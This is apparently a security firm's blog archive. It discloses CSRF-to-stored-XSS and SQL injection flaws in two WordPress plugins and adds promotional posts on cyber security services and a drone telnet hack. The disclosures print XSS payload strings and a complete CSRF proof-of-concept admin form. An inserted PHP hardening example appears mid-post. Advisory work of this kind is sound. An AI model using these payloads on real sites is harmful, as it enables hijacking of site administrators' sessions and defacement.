50 thousand WordPress sites use Paid membership WP Plugin & suffer from SQL injection & CSRF to stored XSS

Posted on July 6, 2017 (updated July 6, 2017). Categories: cyber security, wordpress security

Update: A new version of Paid Memberships Pro has been released to the WordPress repo, fixing the CSRF to stored XSS issue written about below; however, anyone using Paid Memberships Pro 1.9.2 or lower is still vulnerable. The SQL injections still exist in many areas of the code, although some areas, which we had yet to review, are protected. It does show improvement that two issues were fixed so quickly by the developer.

Paid Memberships Pro is a WordPress plugin that helps people buy your products and/or services and is used on over 50 thousand sites; sadly, its security is lacking. We were reviewing the plugin and discovered it is vulnerable to everything from SQL injection and CSRF to stored XSS. While our information is usually locked down to paying customers, we decided it was in the best interest of the WordPress community to publicly expose these flaws. As always, Jetpack, which is owned by Automattic, reports this plugin as safe, due to the flawed way Jetpack decides if something is safe or not, which sadly gives users a false sense of security.

[Image: Incorrect security alert from Jetpack on Paid Memberships Pro]

We reported Paid Memberships Pro to WordPress security, who removed the plugin from the WordPress repo. Unfortunately, removing a plugin from the WordPress repo does not help the users who already have it installed. Because of this, we believe public disclosure is best, especially since rewriting the plugin to fix all the issues in a timely manner would take a team of several people working solely on that project.

How is the WordPress plugin Paid Memberships Pro vulnerable to SQL injection?

This is a good question for those who aren't used to security issues, and the reason is simple. The developer either didn't know about SQL injection or didn't know what to do about it. The code builds SQL queries from user-supplied input with little to no protection against SQL injection. To put it simply, the data that went into the database was not kept separate from the query, so a criminal or researcher could manipulate data in the WordPress database, steal all of it, or do whatever they like.

How is Paid Memberships Pro vulnerable to CSRF to stored XSS?

First, it is important to explain that cross site request forgery (CSRF) and stored XSS are two separate security vulnerabilities which, tied together, do far more damage to the user's site. CSRF allows a researcher or criminal to copy a form (or other code that needs CSRF protection) to another website and then trick a user into visiting that site, forcing them to unknowingly and unwittingly cause damage to their own website. In this case the victim had to be logged in as an admin and be tricked into clicking a damaging link. In the case of the WordPress plugin Paid Memberships Pro, the form in question is also vulnerable to stored XSS. Stored XSS, also known as stored cross site scripting, allows a researcher or criminal to inject their own code into another website; whether that code causes damage or not is fully up to the attacker. In this case it caused defacement of the logged-in admin panel and of the site for users who were just visiting it, which would have allowed the attacker to easily gain control of the entire WordPress site and cause damage to the users and the company's brand.

Here is an image of the stored XSS on Paid Memberships Pro, where we simply made it show the number 1 to demonstrate that code could be run. For those who don't understand that: any code, malicious or otherwise, could have run.

[Image: Paid Memberships Pro XSS exploit example]

Where is the WordPress plugin Paid Memberships Pro vulnerable to CSRF to stored XSS?

Step 1: For CSRF to stored XSS, log in as admin and go to the admin panel.
Step 2: Go to Memberships and then click on Add New Membership Level.
Step 3: There is no CSRF protection on this page, so it is vulnerable to CSRF.
Step 4: Go to the Name parameter and add in a simple '"><Script>alert`1`</script> to get the vulnerability as seen above.
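For contrast with the steps above, here is how the same "add membership level" admin form can be written so that the CSRF-to-stored-XSS chain and the unprotected SQL queries described earlier in this post are both closed. This is an added illustrative example, not Paid Memberships Pro's own code; the pmp_example_* function names and the pmp_example_levels table are assumed, and WordPress is assumed to be loaded.

```php
<?php
// Added example, not Paid Memberships Pro code: a hypothetical "add membership level"
// admin form with the three controls the post says were missing. Assumes WordPress
// is loaded; the pmp_example_* names and the pmp_example_levels table are invented.

function pmp_example_render_level_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin.php?page=pmp-example-levels' ) ); ?>">
        <?php wp_nonce_field( 'pmp_example_save_level', 'pmp_example_nonce' ); ?>
        <label for="name">Name:</label>
        <input id="name" name="name" type="text" value="" />
        <input type="hidden" name="action" value="pmp_example_save_level" />
        <input type="submit" class="button-primary" value="Add New Membership Level" />
    </form>
    <?php
}

function pmp_example_save_level() {
    global $wpdb;
    if ( ! isset( $_POST['action'] ) || 'pmp_example_save_level' !== $_POST['action'] ) {
        return;
    }
    // CSRF: a request forged from another site cannot carry a valid nonce, so it dies here.
    check_admin_referer( 'pmp_example_save_level', 'pmp_example_nonce' );
    // A nonce proves intent, not privilege: still require the capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // Input: strip tags and control characters before the value reaches storage.
    $name = sanitize_text_field( wp_unslash( $_POST['name'] ?? '' ) );
    if ( '' === $name ) {
        return;
    }
    // SQL injection: bind the value with $wpdb->prepare(), never concatenate it into the query.
    $table = $wpdb->prefix . 'pmp_example_levels';
    $wpdb->query( $wpdb->prepare( "INSERT INTO {$table} (name) VALUES (%s)", $name ) );
}

function pmp_example_list_levels() {
    global $wpdb;
    $table = $wpdb->prefix . 'pmp_example_levels';
    // Stored XSS: escape at output, so a stored name containing <script> renders as
    // literal text in the admin's browser instead of executing.
    foreach ( (array) $wpdb->get_results( "SELECT id, name FROM {$table}" ) as $row ) {
        echo '<li>' . esc_html( $row->name ) . '</li>';
    }
}

add_action( 'admin_init', 'pmp_example_save_level' );
```

The nonce alone would not stop a logged-in low-privilege user, which is why the capability check sits beside it; likewise sanitizing on input is defence in depth, and the esc_html() at output is what actually prevents the stored payload from running.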


What should you do to protect yourself? At this point in time the only option is to switch plugins or have your team rewrite the code of the plugin, which is quite a task.


The best way to help protect other users is to share this article with others and alert them to this problem. If you want access to more WordPress security alerts and informative articles like this, you will want to access our WordPress Plugin Security alerts. For those who pay for access, we will be doing write-ups on plugins affecting over 200 thousand sites and another that affects 3 million sites. We have yet to make our automated WordPress security plugin tool post to WordPress automatically, so in the meantime we will provide updates for our customers often.


WordPress CevHerShare Plugin CSRF to Persistent XSS — Jetpack Security incorrect

Posted on June 24, 2017 (updated July 5, 2017). Categories: cyber security, wordpress security

[Image: CevherShare WordPress plugin CSRF to persistent XSS]

The WordPress CevherShare plugin allows users to share content on social media, as the name implies. CevherShare suffered from cross site request forgery on the admin side, which we then chained together with persistent cross site scripting on the admin side. What does this mean in basic terms? It means that if an admin was logged in and clicked on a malicious link, went to a malicious website, or viewed a malicious image, it could inject malicious code into the WordPress admin backend, thus compromising the security of the website.

[Image: Jetpack security rating incorrect]

If you look up CevherShare in the WordPress.org repo it will say it doesn't exist, because wordpress.org removed it due to this security issue over 2 years ago when we reported it, and surprisingly an update was never released. Unfortunately, Jetpack security by wordpress.com says the CevherShare WordPress plugin is safe, since they only go on public reports to identify whether a plugin is safe or not, which is a flawed way of identifying the security of WordPress plugins. We have checked all the WordPress plugins in the WordPress.org repo and let our customers know if they are running plugins that are vulnerable and undisclosed.


If you are still using CevherShare, we recommend removing it and installing another social sharing plugin, or just manually adding the code for each social media site you want to use. If you would like our help with making your site more secure, feel free to contact us.


If you are interested in a proof of concept, which shows how and where the software is vulnerable, here you go.

First, modify this vulnerable form and insert the XSS payload into the name parameter:

'"><SCRipt confirm(document.referrer);</SCRipt>

Now when someone who is logged in submits this form from elsewhere, it will automatically inject code into their WordPress site, as the picture above shows.

<form action="http://example.com/wp-admin/options-general.php?page=CevherShare" method="post">
<p class="mediumtext alignleft"><label class="wide" for="name">Name:</label>
<input id="name" class="mediumtext" name="name" type="text" value="yahoo" /></p>
<p class="smalltext alignleft"><label class="wide" for="position">Position:</label>
<input id="position" class="smalltext" name="position" type="text" value="12" /></p>
<p class="checkfield alignleft"><input name="enabled" type="hidden" value="0" />
<input id="enabled" checked="checked" name="enabled" type="checkbox" value="1" /> <label for="enabled">Enabled?</label></p>

<div style="clear: both;"></div>
<label class="wide" for="big">Big Button:</label>
<textarea id="big" class="text" name="big" rows="5">&lt;script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="square"&gt;[url]&lt;/script&gt;</textarea>

<label class="wide" for="small">Small Button:</label>
<textarea id="small" class="text" name="small" rows="5">&lt;script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="small-votes"&gt;[url]&lt;/script&gt;</textarea>

<input name="do" type="hidden" value="update" />
<input name="id" type="hidden" value="12" />
<input name="status" type="hidden" value="Share button has been updated." />
<input class="alignleft button-primary" type="submit" value="Update Button" />

</form>


Cyber Security — A Beginners guide to Cyber Security

Posted on May 19, 2017 (updated May 19, 2017). Categories: cyber security, web security

What is cyber security?

Cyber security is the art of protecting your systems from criminals who mean to do you harm, including ransomware like WannaCry, which we recently wrote a guide on. Cyber security also helps you keep criminals away from your private information and, even more importantly, your customers' private information.

If you haven't heard of cyber security, then you most likely haven't heard of phishing, which is fine. Phishing is another word for fraudulent emails sent to you by people who are trying to gain illegal access to your computer. Once they gain access to your computer, they can steal all your data and use your machine as part of a large network of thousands of machines (also referred to as a zombie network) to do whatever they want. To keep the malware spreading, they can also use your contact list to send it to all your contacts from your email address.


If you don't think that's bad, it gets worse. Once inside your system, the criminals have control of your computer, not you. They could charge you thousands of dollars to potentially relinquish control of it, or they could put all your information online for the world to see. Of course there are plenty of other uses for your machine and your data, but we aren't getting into that in this article, since that would make up a good portion of a book.


Why does my website need security? I don’t store anything sensitive on it.

This is a point a lot of people make, and while you may not store anything on it, people do come to your website (and we make sure of that if you use our SEO services, so that people can find you on search engines). If people come to your site and it is hacked, they will either also get infected, see your site defaced (potentially with dead bodies on it, as we've encountered in the past), or Google could block them from going to your site, which also hurts your rankings on its search engine.

If Google blocks them from coming to your site, that does major damage to your reputation. If your site is defaced, that also damages your reputation. Most people don't know that 60 percent of cyber crime victims go out of business and 50 percent of all attacks are against small businesses.

This is what your customers will see if Google blocks them from coming to your site:

[Image: Google hacked site warning blocks access to your website]


So what can you do about this? Well, you can keep learning about cyber security by signing up for our mailing list, which sends out exclusive information only available to people on our mailing list.


Hackers for hire to secure your website from criminals

Posted on April 22, 2017 (updated April 27, 2017). Categories: cyber security, web security

We are cyber security professionals and information security professionals, but when it boils down to it we are hackers for hire who are easy to find and easy to contact, or to hire through one of our hacker for hire subscription plans. When we are hired by the private sector we help secure your websites, servers, applications and any IoT device under the sun. Our plans currently only support websites; however, we are professionals at IoT security, also known as internet of things security, and server security. Companies hire us to stop criminal hacking before it happens, or, if it's already started, we put a stop to it and provide an analysis of the criminals' behavior and the information we have on them, along with whether they are known elsewhere, since many criminals want to be known, they just don't want to be caught.

What type of hacking will you not do? Since you're easy-to-find hackers for hire, will you do unethical hacking?

We are ethical hackers for hire who are easy to find, so we will not do illegal hacking. We will end up putting a FAQ together about the most common requests for illegal hacking, but a few off the top of our heads are requests to hack another user's Facebook account, Instagram, or any other service for you. We don't care if you tell us the person you want hacked is a cheating slimeball; that doesn't make it legal to hack them. Since we're ethical hackers for hire, we stick by our code and won't hack cheating slimeballs for you.

What can you do as hackers for hire?

As hackers for hire we can do a lot, like secure your website, server, IoT products, etc. Working as hackers for hire we have recovered stolen laptops, and we identified a hacker who claimed to be a woman in San Diego, who ended up being a man in India living in a flea hotel, who took a trove of unreleased music from a studio.

We've identified employees who have destroyed their company's systems, making them inoperable. We've worked for Fortune 100 companies, and we've had GoDaddy as a client, showing them security flaws in their servers, where we found a lot of issues.

We identify malware in companies that is infecting their users, we've helped make it so companies don't have to pay ransomware by securing their systems, and we offer anti-phishing training.

What can we not do as hackers for hire? Whatever the law prohibits, which is becoming less and less. We can show you how insecure your internet-connected devices are, also called internet of things devices, among other things. It's even legal to hack a car or anything else you own to show how insecure it is.

Remotely Disconnecting the Bebop Drone Pilot: Exploit As Seen on ZDF

Posted on April 17, 2017 (updated April 17, 2017). Categories: cyber security

Last year we ran into an issue when recording Smarter Living for ZDF: they gave us a drone we hadn't hacked before, the Bebop 1. It took half an hour to find a vulnerability and exploit the Bebop drone. While it isn't a fancy exploit, it got the job done. Parrot had tried to put a patch in place for the Bebop drone to stop people from accessing telnet; however, you could still send requests to telnet. We sent a bunch of telnet requests to the drone while it was flying and remotely disconnected the user from being able to control the drone. Instead of the drone crashing, no one had control of it and it was doing whatever it wanted, requiring the director and me to grab it out of the sky.

While we have a ton more drone vulnerabilities that we spoke about at BSides LA, we won't be releasing them today. We went all the way down to a binary analysis, which was quite interesting and which we may make publicly available.